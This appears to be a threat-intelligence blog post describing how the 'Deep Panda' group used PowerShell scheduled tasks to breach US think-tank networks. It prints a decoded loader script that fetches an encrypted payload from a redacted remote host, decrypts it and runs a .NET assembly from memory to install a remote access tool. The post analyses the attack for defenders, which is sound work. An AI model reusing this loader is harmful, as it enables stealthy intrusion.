Chinese hackers, aka “Deep Panda”, leverage PowerShell while compromising US think-tank computer systems.
Recently, we detected breaches of these networks via the use of powershell scripts deployed by the adversary as scheduled tasks on Windows machines. The scripts are passed to the powershell interpreter through the command line to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of Compromise (IOC)-based detection.
The script in the command line is base64 encoded, but when decoded it translates to the following code snippet:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$wc = New-Object -TypeName System.Net.WebClient
$wc.Headers.Add(“Accept-Language”, “en-US,en;q=0.” + ([IntPtr]::Size – 1).ToString())
$wc.Headers.Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)”)
$rndn = Get-Random
$wc.Headers.Add(“Cookie”, “p=” + $rndn)
$data = $wc.DownloadData(“https://<ANONYMIZED>/config/oauth/”)
[string[]]$xags = “https://<ANONYMIZED>/config/login/”, “WMITool.Program”, “Main”, “/f”, “ssh”, “/s”, “<ANONYMIZED>”, “/p”, “443”
$Passphrase = “<ANONYMIZED>”
$salts = “<ANONYMIZED>”
$r = new-Object System.Security.Cryptography.RijndaelManaged
$pass = [System.Text.Encoding]::UTF8.GetBytes($Passphrase)
$salt = [System.Text.Encoding]::UTF8.GetBytes($salts)
$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1″, 5).GetBytes(32) #256/8
$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($rndn) )[0..15]
$d = $r.CreateDecryptor()
$ms = new-Object IO.MemoryStream @(,$data)
$cs = new-Object Security.Cryptography.CryptoStream $ms,$d,”Read”
$dfs = New-Object System.IO.Compression.GzipStream $cs, ([IO.Compression.CompressionMode]::Decompress)
$msout = New-Object System.IO.MemoryStream
[byte[]]$buffer = new-object byte[] 4096
[int]$count = 0
do
{
$count = $dfs.Read($buffer, 0, $buffer.Length)
$msout.Write($buffer, 0, $count)
} while ($count -gt 0)
$dfs.Close()
$cs.Close()
$ms.Close()
$r.Clear()
[byte[]]$bin = $msout.ToArray()
$al = New-Object -TypeName System.Collections.ArrayList
$al.Add($xags)
$asm = [System.Reflection.Assembly]::Load($bin)
$asm.EntryPoint.Invoke($null, $al.ToArray())
sleep 5
Exit
Once executed, it downloads and executes from memory a .NET executable (typically named Wafer), which in turn typically downloads and runs MadHatter .NET Remote Access Tool (RAT), one of the favorites of DEEP PANDA. By running them from memory, it leaves no disk artifacts or host-based IOCs that can be identified in forensic analysis. This is typical for DEEP PANDA — stealth is their specialty and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.
Read the article:
Deep in Thought: Chinese Targeting of National Security Think Tanks
Recent Comments